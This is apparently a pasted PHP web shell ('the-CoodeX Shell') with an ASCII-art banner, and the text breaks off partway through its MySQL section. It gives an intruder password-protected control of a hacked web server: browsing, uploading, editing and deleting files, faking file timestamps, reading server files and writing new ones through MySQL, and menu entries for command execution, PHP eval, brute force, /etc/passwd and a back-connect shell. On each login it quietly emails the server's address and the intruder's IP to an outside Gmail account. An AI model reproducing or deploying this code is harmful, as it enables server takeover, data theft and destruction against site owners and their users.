· 11 years ago · Jul 19, 2015, 02:14 PM
1<?php ?><?php
2/********************************************\
3|* Edit & Develop by the-CoodeX *|
4|*https://www.facebook.com/ali.bdaer.hacker *|
5|* == Hacking & Security == *|
6\********************************************/
7/*
8----------------------------------------------------------------------------
9 ______
10 .-" "-.
11 / \
12 | |
13 |, .-. .-. ,|
14 | )(_o/ \o_)( |
15 |/ /\ \|
16 (@_ (_ ^^ _)
17 _ ) \_______\__|IIIIII|__/_______________________
18 (_)@8@8{}<________|-\IIIIII/-|________________________/ by Sido Hacker
19 )_/ \ /
20 (@ `--------`
21
22
23
24
25
26
27
28
29
30
31
32----------------------------------------------------------------------------
33
34*/
35error_reporting(7);
36@set_magic_quotes_runtime(0);
37ob_start();
38$mtime = explode(' ', microtime());
39$starttime = $mtime[1] + $mtime[0];
40define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)) . '/');
41//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
42define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
43define('IS_COM', class_exists('COM') ? 1 : 0);
44define('IS_GPC', get_magic_quotes_gpc());
45$dis_func = get_cfg_var('disable_functions');
46define('IS_PHPINFO', (!eregi("phpinfo", $dis_func)) ? 1 : 0);
47@set_time_limit(0);
48foreach (array('_GET', '_POST') as $_request) {
49 foreach ($$_request as $_key => $_value) {
50 if ($_key{0} != '_') {
51 if (IS_GPC) {
52 $_value = s_array($_value);
53 }
54 $$_key = $_value;
55 }
56 }
57}
58/*================= Info Login ================*/
59$admin = array();
60$admin['check'] = true;
61$admin['pass'] = '25846'; // Password login
62$admin['cookiepre'] = '';
63$admin['cookiedomain'] = '';
64$admin['cookiepath'] = '/';
65$admin['cookielife'] = 86400;
66/*===================== End =====================*/
67if ($charset == 'utf8') {
68 header("content-Type: text/html; charset=utf-8");
69} elseif ($charset == 'big5') {
70 header("content-Type: text/html; charset=big5");
71} elseif ($charset == 'gbk') {
72 header("content-Type: text/html; charset=gbk");
73} elseif ($charset == 'latin1') {
74 header("content-Type: text/html; charset=iso-8859-2");
75}
76$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
77$timestamp = time();
78/*===================== Login =====================*/
79if ($action == "logout") {
80 scookie('tmtpass', '', -86400 * 365);
81 p('<meta http-equiv="refresh" content="0;URL=' . $self . '">');
82 p('<body background=#>');
83 exit;
84}
85if ($admin['check']) {
86 if ($doing == 'login') {
87 if ($admin['pass'] == $password) {
88 scookie('tmtpass', $password);
89 // Function mail Sender to my Email - Please remove this before you using this shell code, Thanks -
90 $time_shell = "" . date("d/m/Y - H:i:s") . "";
91 $ip_remote = $_SERVER["REMOTE_ADDR"];
92 $from_shellcode = 'shell@' . gethostbyname($_SERVER['SERVER_NAME']) . '';
93 $to_email = 'spamhacher2015@gmail.com
94/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */';
95 $server_mail = "" . gethostbyname($_SERVER['SERVER_NAME']) . " - " . $_SERVER['HTTP_HOST'] . "";
96 $linkcr = "Link: " . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . " - IP Excuting: $ip_remote - Time: $time_shell";
97 $header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
98 @mail($to_email, $server_mail, $linkcr, $header);
99 p('<meta http-equiv="refresh" content="2;URL=' . $self . '">');
100 p('<body background=#>
101<BR><BR><div align=center><font color=yellow face=tahoma size=2>Welcome on shell the-CoodeX HACKED OK\'s Member - Please wait...<BR><img src=http://el.kz/templates/base/images/loading.gif></div>');
102 exit;
103 } else {
104 $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
105 echo $err_mess;
106 }
107 }
108 if ($_COOKIE['tmtpass']) {
109 if ($_COOKIE['tmtpass'] != $admin['pass']) {
110 loginpage();
111 }
112 } else {
113 loginpage();
114 }
115}
116/*===================== Login =====================*/
117$errmsg = '';
118if ($action == 'phpinfo') {
119 if (IS_PHPINFO) {
120 phpinfo();
121 } else {
122 $errmsg = 'phpinfo() function has non-permissible';
123 }
124}
125if ($doing == 'downfile' && $thefile) {
126 if (!@file_exists($thefile)) {
127 $errmsg = 'The file you want Downloadable was nonexistent';
128 } else {
129 $fileinfo = pathinfo($thefile);
130 header('Content-type: application/x-' . $fileinfo['extension']);
131 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
132 header('Content-Length: ' . filesize($thefile));
133 @readfile($thefile);
134 exit;
135 }
136}
137if ($doing == 'backupmysql' && !$saveasfile) {
138 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
139 $table = array_flip($table);
140 $result = q("SHOW tables");
141 if (!$result) p('<h2>' . mysql_error() . '</h2>');
142 $filename = basename($_SERVER['HTTP_HOST'] . '_MySQL.sql');
143 header('Content-type: application/unknown');
144 header('Content-Disposition: attachment; filename=' . $filename);
145 $mysqldata = '';
146 while ($currow = mysql_fetch_array($result)) {
147 if (isset($table[$currow[0]])) {
148 $mysqldata.= sqldumptable($currow[0]);
149 }
150 }
151 mysql_close();
152 exit;
153}
154// Mysql
155if ($doing == 'mysqldown') {
156 if (!$dbname) {
157 $errmsg = 'Please input dbname';
158 } else {
159 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
160 if (!file_exists($mysqldlfile)) {
161 $errmsg = 'The file you want Downloadable was nonexistent';
162 } else {
163 $result = q("select load_file('$mysqldlfile');");
164 if (!$result) {
165 q("DROP TABLE IF EXISTS tmp_angel;");
166 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
167 //Download SQL
168 q("LOAD DATA LOCAL INFILE '" . addslashes($mysqldlfile) . "' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
169 $result = q("select content from tmp_angel");
170 q("DROP TABLE tmp_angel");
171 }
172 $row = @mysql_fetch_array($result);
173 if (!$row) {
174 $errmsg = 'Load file failed ' . mysql_error();
175 } else {
176 $fileinfo = pathinfo($mysqldlfile);
177 header('Content-type: application/x-' . $fileinfo['extension']);
178 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
179 header("Accept-Length: " . strlen($row[0]));
180 echo $row[0];
181 exit;
182 }
183 }
184 }
185}
186?>
187<html>
188<head>
189<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
190<title><?php echo str_replace('.', '', 'the-CoodeX. SHELL'); ?></title>
191<style type="text/css">
192body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}
193
194a {color: #74A202;text-decoration:none;}
195a:hover{color: #f00;text-decoration:underline;}
196.alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
197.alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
198.focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
199.fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
200.fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
201.head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
202.head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
203.head td span{font-weight:normal;}
204form{margin:0;padding:0;}
205h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
206ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
207u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
208input, textarea, button
209{
210 font-size: 9pt;
211 color: #ccc;
212 font-family: verdana, sans-serif;
213 background-color: #202020;
214 border-left: 1px solid #74A202;
215 border-top: 1px solid #74A202;
216 border-right: 1px solid #74A202;
217 border-bottom: 1px solid #74A202;
218}
219select
220{
221 font-size: 8pt;
222 font-weight: normal;
223 color: #ccc;
224 font-family: verdana, sans-serif;
225 background-color: #202020;
226}
227
228</style>
229<script type="text/javascript">
230function CheckAll(form) {
231 for(var i=0;i<form.elements.length;i++) {
232 var e = form.elements[i];
233 if (e.name != 'chkall')
234 e.checked = form.chkall.checked;
235 }
236}
237function $(id) {
238 return document.getElementById(id);
239}
240function goaction(act){
241 $('goaction').action.value=act;
242 $('goaction').submit();
243}
244</script>
245</head>
246<body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black>
247
248
249<div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
250 <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
251 <tr>
252 <td align="center" valign=center>
253 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
254 Loading<img src="http://el.kz/templates/base/images/loading.gif">
255 </div>
256 </td>
257 </tr>
258 </table>
259 </div>
260 <script>
261 var ld=(document.all);
262 var ns4=document.layers;
263 var ns6=document.getElementById&&!document.all;
264 var ie4=document.all;
265 if (ns4)
266 ld=document.loading;
267 else if (ns6)
268 ld=document.getElementById("loading").style;
269 else if (ie4)
270 ld=document.all.loading.style;
271 function init()
272 {
273 if(ns4){ld.visibility="hidden";}
274 else if (ns6||ie4) ld.display="none";
275 }
276 </script>
277
278
279
280
281<table width="100%" border="0" cellpadding="0" cellspacing="0">
282 <tr class="head_small">
283 <td width=100%>
284 <table width=100%><tr class="head_small"><td width=86px><a title="the-CoodeX Shell" href="<?php $self; ?>"></a></td><td>
285 <span style="float:right;"> <?php echo "Hostname: " . $_SERVER['HTTP_HOST'] . ""; ?> | <a href="https://www.facebook.com/ali.bdaer.hacker" target="_blank"><?php echo str_replace('.', '', 'the-CoodeX'); ?> Version 2.4</a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span>
286
287 <?php
288$curl_on = @function_exists('curl_version');
289$mysql_on = @function_exists('mysql_connect');
290$mssql_on = @function_exists('mssql_connect');
291$pg_on = @function_exists('pg_connect');
292$ora_on = @function_exists('ocilogon');
293echo (($safe_mode) ? ("Safe_mod: <b><font color=green>ON</font></b> - ") : ("Safe_mod: <b><font color=red>OFF</font></b> - "));
294echo "PHP version: <b>" . @phpversion() . "</b> - ";
295echo "cURL: " . (($curl_on) ? ("<b><font color=green>ON</font></b> - ") : ("<b><font color=red>OFF</font></b> - "));
296echo "MySQL: <b>";
297$mysql_on = @function_exists('mysql_connect');
298if ($mysql_on) {
299 echo "<font color=green>ON</font></b> - ";
300} else {
301 echo "<font color=red>OFF</font></b> - ";
302}
303echo "MSSQL: <b>";
304$mssql_on = @function_exists('mssql_connect');
305if ($mssql_on) {
306 echo "<font color=green>ON</font></b> - ";
307} else {
308 echo "<font color=red>OFF</font></b> - ";
309}
310echo "PostgreSQL: <b>";
311$pg_on = @function_exists('pg_connect');
312if ($pg_on) {
313 echo "<font color=green>ON</font></b> - ";
314} else {
315 echo "<font color=red>OFF</font></b> - ";
316}
317echo "Oracle: <b>";
318$ora_on = @function_exists('ocilogon');
319if ($ora_on) {
320 echo "<font color=green>ON</font></b>";
321} else {
322 echo "<font color=red>OFF</font></b><BR>";
323}
324echo "Disable functions : <b>";
325if ('' == ($df = @ini_get('disable_functions'))) {
326 echo "<font color=green>NONE</font></b><BR>";
327} else {
328 echo "<font color=red>$df</font></b><BR>";
329}
330echo "<font color=white>Uname -a</font>: " . @substr(@php_uname(), 0, 120) . "<br>";
331echo "<font color=white>Server</font>: " . @substr($SERVER_SOFTWARE, 0, 120) . " - <font color=white>id</font>: " . @getmyuid() . "(" . @get_current_user() . ") - uid=" . @getmyuid() . " (" . @get_current_user() . ") gid=" . @getmygid() . "(" . @get_current_user() . ")<br>";
332?>
333 </td></tr></table></td>
334 </tr>
335 <tr class="alt1">
336 <td width=100%><span style="float:right;">[Server IP: <?php echo "<font color=yellow>" . gethostbyname($_SERVER['SERVER_NAME']) . "</font>"; ?> - Your IP: <?php echo "<font color=yellow>" . $_SERVER['REMOTE_ADDR'] . "</font>"; ?>] </span>
337
338 <a href="javascript:goaction('file');">File Manager</a> |
339 <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
340 <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
341 <a href="javascript:goaction('shell');">Execute Command</a> |
342 <a href="javascript:goaction('phpenv');">PHP Variable</a> |
343 <a href="javascript:goaction('eval');">Eval PHP Code</a>
344 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('brute');">Brute</a> <?php
345} ?>
346 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php
347} ?>
348 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php
349} ?>
350 </td>
351 </tr>
352</table>
353<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
354<?php
355formhead(array('name' => 'goaction'));
356makehide('action');
357formfoot();
358$errmsg && m($errmsg);
359// Dir function
360!$dir && $dir = '.';
361$nowpath = getPath(SA_ROOT, $dir);
362if (substr($dir, -1) != '/') {
363 $dir = $dir . '/';
364}
365$uedir = ue($dir);
366if (!$action || $action == 'file') {
367 // Non-writeable
368 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
369 // Delete dir
370 if ($doing == 'deldir' && $thefile) {
371 if (!file_exists($thefile)) {
372 m($thefile . ' directory does not exist');
373 } else {
374 m('Directory delete ' . (deltree($thefile) ? basename($thefile) . ' success' : 'failed'));
375 }
376 }
377 // Create new dir
378 elseif ($newdirname) {
379 $mkdirs = $nowpath . $newdirname;
380 if (file_exists($mkdirs)) {
381 m('Directory has already existed');
382 } else {
383 m('Directory created ' . (@mkdir($mkdirs, 0777) ? 'success' : 'failed'));
384 @chmod($mkdirs, 0777);
385 }
386 }
387 // Upload file
388 elseif ($doupfile) {
389 m('File upload ' . (@copy($_FILES['uploadfile']['tmp_name'], $uploaddir . '/' . $_FILES['uploadfile']['name']) ? 'success' : 'failed'));
390 }
391 // Edit file
392 elseif ($editfilename && $filecontent) {
393 $fp = @fopen($editfilename, 'w');
394 m('Save file ' . (@fwrite($fp, $filecontent) ? 'success' : 'failed'));
395 @fclose($fp);
396 }
397 // Modify
398 elseif ($pfile && $newperm) {
399 if (!file_exists($pfile)) {
400 m('The original file does not exist');
401 } else {
402 $newperm = base_convert($newperm, 8, 10);
403 m('Modify file attributes ' . (@chmod($pfile, $newperm) ? 'success' : 'failed'));
404 }
405 }
406 // Rename
407 elseif ($oldname && $newfilename) {
408 $nname = $nowpath . $newfilename;
409 if (file_exists($nname) || !file_exists($oldname)) {
410 m($nname . ' has already existed or original file does not exist');
411 } else {
412 m(basename($oldname) . ' renamed ' . basename($nname) . (@rename($oldname, $nname) ? ' success' : 'failed'));
413 }
414 }
415 // Copu
416 elseif ($sname && $tofile) {
417 if (file_exists($tofile) || !file_exists($sname)) {
418 m('The goal file has already existed or original file does not exist');
419 } else {
420 m(basename($tofile) . ' copied ' . (@copy($sname, $tofile) ? basename($tofile) . ' success' : 'failed'));
421 }
422 }
423 // File exit
424 elseif ($curfile && $tarfile) {
425 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
426 m('The goal file has already existed or original file does not exist');
427 } else {
428 $time = @filemtime($tarfile);
429 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
430 }
431 }
432 // Date
433 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
434 if (!@file_exists($curfile)) {
435 m(basename($curfile) . ' does not exist');
436 } else {
437 $time = strtotime("$year-$month-$day $hour:$minute:$second");
438 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
439 }
440 }
441 // Download
442 elseif ($doing == 'downrar') {
443 if ($dl) {
444 $dfiles = '';
445 foreach ($dl as $filepath => $value) {
446 $dfiles.= $filepath . ',';
447 }
448 $dfiles = substr($dfiles, 0, strlen($dfiles) - 1);
449 $dl = explode(',', $dfiles);
450 $zip = new PHPZip($dl);
451 $code = $zip->out;
452 header('Content-type: application/octet-stream');
453 header('Accept-Ranges: bytes');
454 header('Accept-Length: ' . strlen($code));
455 header('Content-Disposition: attachment;filename=' . $_SERVER['HTTP_HOST'] . '_Files.tar.gz');
456 echo $code;
457 exit;
458 } else {
459 m('Please select file(s)');
460 }
461 }
462 // Delete file
463 elseif ($doing == 'delfiles') {
464 if ($dl) {
465 $dfiles = '';
466 $succ = $fail = 0;
467 foreach ($dl as $filepath => $value) {
468 if (@unlink($filepath)) {
469 $succ++;
470 } else {
471 $fail++;
472 }
473 }
474 m('Deleted file have finishedchoose ' . count($dl) . ' success ' . $succ . ' fail ' . $fail);
475 } else {
476 m('Please select file(s)');
477 }
478 }
479 // Function Newdir
480 formhead(array('name' => 'createdir'));
481 makehide('newdirname');
482 makehide('dir', $nowpath);
483 formfoot();
484 formhead(array('name' => 'fileperm'));
485 makehide('newperm');
486 makehide('pfile');
487 makehide('dir', $nowpath);
488 formfoot();
489 formhead(array('name' => 'copyfile'));
490 makehide('sname');
491 makehide('tofile');
492 makehide('dir', $nowpath);
493 formfoot();
494 formhead(array('name' => 'rename'));
495 makehide('oldname');
496 makehide('newfilename');
497 makehide('dir', $nowpath);
498 formfoot();
499 formhead(array('name' => 'fileopform'));
500 makehide('action');
501 makehide('opfile');
502 makehide('dir');
503 formfoot();
504 $free = @disk_free_space($nowpath);
505 !$free && $free = 0;
506 $all = @disk_total_space($nowpath);
507 !$all && $all = 0;
508 $used = $all - $free;
509 $used_percent = @round(100 / ($all / $free), 2);
510 p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>' . sizecount($free) . '</font> of <font color=red>' . sizecount($all) . '</font> (<font color=red>' . $used_percent . '</font>%)</font>');
511?>
512<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
513 <form action="" method="post" id="godir" name="godir">
514 <tr>
515 <td nowrap>Current Directory (<?php echo $dir_writeable; ?>, <?php echo getChmod($nowpath); ?>)</td>
516 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath; ?>" type="text" style="width:100%;margin:0 8px;"></td>
517 <td nowrap><input class="bt" value="GO" type="submit"></td>
518 </tr>
519 </form>
520</table>
521<script type="text/javascript">
522function createdir(){
523 var newdirname;
524 newdirname = prompt('Please input the directory name:', '');
525 if (!newdirname) return;
526 $('createdir').newdirname.value=newdirname;
527 $('createdir').submit();
528}
529function fileperm(pfile){
530 var newperm;
531 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
532 if (!newperm) return;
533 $('fileperm').newperm.value=newperm;
534 $('fileperm').pfile.value=pfile;
535 $('fileperm').submit();
536}
537function copyfile(sname){
538 var tofile;
539 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
540 if (!tofile) return;
541 $('copyfile').tofile.value=tofile;
542 $('copyfile').sname.value=sname;
543 $('copyfile').submit();
544}
545function rename(oldname){
546 var newfilename;
547 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
548 if (!newfilename) return;
549 $('rename').newfilename.value=newfilename;
550 $('rename').oldname.value=oldname;
551 $('rename').submit();
552}
553function dofile(doing,thefile,m){
554 if (m && !confirm(m)) {
555 return;
556 }
557 $('filelist').doing.value=doing;
558 if (thefile){
559 $('filelist').thefile.value=thefile;
560 }
561 $('filelist').submit();
562}
563function createfile(nowpath){
564 var filename;
565 filename = prompt('Please input the file name:', '');
566 if (!filename) return;
567 opfile('editfile',nowpath + filename,nowpath);
568}
569function opfile(action,opfile,dir){
570 $('fileopform').action.value=action;
571 $('fileopform').opfile.value=opfile;
572 $('fileopform').dir.value=dir;
573 $('fileopform').submit();
574}
575function godir(dir,view_writable){
576 if (view_writable) {
577 $('godir').view_writable.value=1;
578 }
579 $('godir').dir.value=dir;
580 $('godir').submit();
581}
582</script>
583 <?php
584 tbhead();
585 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
586 p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="' . $dir . '" type="hidden" /><input name="dir" value="' . $dir . '" type="hidden" /></div>');
587 p('<a href="javascript:godir(\'' . $_SERVER["DOCUMENT_ROOT"] . '\');">WebRoot</a>');
588 if ($view_writable) {
589 p(' | <a href="javascript:godir(\'' . $nowpath . '\');">View All</a>');
590 } else {
591 p(' | <a href="javascript:godir(\'' . $nowpath . '\',\'1\');">View Writable</a>');
592 }
593 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\'' . $nowpath . '\');">Create File</a>');
594 if (IS_WIN && IS_COM) {
595 $obj = new COM('scripting.filesystemobject');
596 if ($obj && is_object($obj)) {
597 $DriveTypeDB = array(0 => 'Unknow', 1 => 'Removable', 2 => 'Fixed', 3 => 'Network', 4 => 'CDRom', 5 => 'RAM Disk');
598 foreach ($obj->Drives as $drive) {
599 if ($drive->DriveType == 2) {
600 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Size:' . sizecount($drive->TotalSize) . ' Free:' . sizecount($drive->FreeSpace) . ' Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
601 } else {
602 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
603 }
604 }
605 }
606 }
607 p('</td></tr></form>');
608 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
609 // Get path
610 $dirdata = array();
611 $filedata = array();
612 if ($view_writable) {
613 $dirdata = GetList($nowpath);
614 } else {
615 // Open dir
616 $dirs = @opendir($dir);
617 while ($file = @readdir($dirs)) {
618 $filepath = $nowpath . $file;
619 if (@is_dir($filepath)) {
620 $dirdb['filename'] = $file;
621 $dirdb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
622 $dirdb['dirchmod'] = getChmod($filepath);
623 $dirdb['dirperm'] = getPerms($filepath);
624 $dirdb['fileowner'] = getUser($filepath);
625 $dirdb['dirlink'] = $nowpath;
626 $dirdb['server_link'] = $filepath;
627 $dirdb['client_link'] = ue($filepath);
628 $dirdata[] = $dirdb;
629 } else {
630 $filedb['filename'] = $file;
631 $filedb['size'] = sizecount(@filesize($filepath));
632 $filedb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
633 $filedb['filechmod'] = getChmod($filepath);
634 $filedb['fileperm'] = getPerms($filepath);
635 $filedb['fileowner'] = getUser($filepath);
636 $filedb['dirlink'] = $nowpath;
637 $filedb['server_link'] = $filepath;
638 $filedb['client_link'] = ue($filepath);
639 $filedata[] = $filedb;
640 }
641 } // while
642 unset($dirdb);
643 unset($filedb);
644 @closedir($dirs);
645 }
646 @sort($dirdata);
647 @sort($filedata);
648 $dir_i = '0';
649 foreach ($dirdata as $key => $dirdb) {
650 if ($dirdb['filename'] != '..' && $dirdb['filename'] != '.') {
651 $thisbg = bg();
652 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
653 p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
654 p('<td><a href="javascript:godir(\'' . $dirdb['server_link'] . '\');">' . $dirdb['filename'] . '</a></td>');
655 p('<td nowrap>' . $dirdb['mtime'] . '</td>');
656 p('<td nowrap>--</td>');
657 p('<td nowrap>');
658 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirchmod'] . '</a> / ');
659 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirperm'] . '</a>' . $dirdb['fileowner'] . '</td>');
660 p('<td nowrap><a href="javascript:dofile(\'deldir\',\'' . $dirdb['server_link'] . '\',\'Are you sure will delete ' . $dirdb['filename'] . '? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\'' . $dirdb['server_link'] . '\');">Rename</a></td>');
661 p('</tr>');
662 $dir_i++;
663 } else {
664 if ($dirdb['filename'] == '..') {
665 p('<tr class=fout>');
666 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\'' . getUpPath($nowpath) . '\');">Parent Directory</a></td>');
667 p('</tr>');
668 }
669 }
670 }
671 p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
672 p('<form id="filelist" name="filelist" action="' . $self . '" method="post">');
673 makehide('action', 'file');
674 makehide('thefile');
675 makehide('doing');
676 makehide('dir', $nowpath);
677 $file_i = '0';
678 foreach ($filedata as $key => $filedb) {
679 if ($filedb['filename'] != '..' && $filedb['filename'] != '.') {
680 $fileurl = str_replace(SA_ROOT, '', $filedb['server_link']);
681 $thisbg = bg();
682 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
683 p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl[' . $filedb['server_link'] . ']"></td>');
684 p('<td><a href="' . $fileurl . '" target="_blank">' . $filedb['filename'] . '</a></td>');
685 p('<td nowrap>' . $filedb['mtime'] . '</td>');
686 p('<td nowrap>' . $filedb['size'] . '</td>');
687 p('<td nowrap>');
688 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['filechmod'] . '</a> / ');
689 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['fileperm'] . '</a>' . $filedb['fileowner'] . '</td>');
690 p('<td nowrap>');
691 p('<a href="javascript:dofile(\'downfile\',\'' . $filedb['server_link'] . '\');">Down</a> | ');
692 p('<a href="javascript:copyfile(\'' . $filedb['server_link'] . '\');">Copy</a> | ');
693 p('<a href="javascript:opfile(\'editfile\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Edit</a> | ');
694 p('<a href="javascript:rename(\'' . $filedb['server_link'] . '\');">Rename</a> | ');
695 p('<a href="javascript:opfile(\'newtime\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Time</a>');
696 p('</td></tr>');
697 $file_i++;
698 }
699 }
700 p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">' . $dir_i . ' directories / ' . $file_i . ' files</td></tr>');
701 p('</form></table>');
702} // end dir
703elseif ($action == 'sqlfile') {
704 if ($doing == "mysqlupload") {
705 $file = $_FILES['uploadfile'];
706 $filename = $file['tmp_name'];
707 if (file_exists($savepath)) {
708 m('The goal file has already existed');
709 } else {
710 if (!$filename) {
711 m('Please choose a file');
712 } else {
713 $fp = @fopen($filename, 'r');
714 $contents = @fread($fp, filesize($filename));
715 @fclose($fp);
716 $contents = bin2hex($contents);
717 if (!$upname) $upname = $file['name'];
718 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
719 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
720 m($result ? 'Upload success' : 'Upload has failed: ' . mysql_error());
721 }
722 }
723 }
724?>
725<script type="text/javascript">
726function mysqlfile(doing){
727 if(!doing) return;
728 $('doing').value=doing;
729 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
730 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
731 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
732 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
733 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
734 $('mysqlfile').charset.value=$('dbinfo').charset.value;
735 $('mysqlfile').submit();
736}
737</script>
738<?php
739 !$dbhost && $dbhost = 'localhost';
740 !$dbuser && $dbuser = 'root';
741 !$dbport && $dbport = '3306';
742 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
743 formhead(array('title' => 'MYSQL Information', 'name' => 'dbinfo'));
744 makehide('action', 'sqlfile');
745 p('<p>');
746 p('DBHost:');
747 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
748 p(':');
749 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
750 p('DBUser:');
751 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
752 p('DBPass:');
753 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
754 p('DBName:');
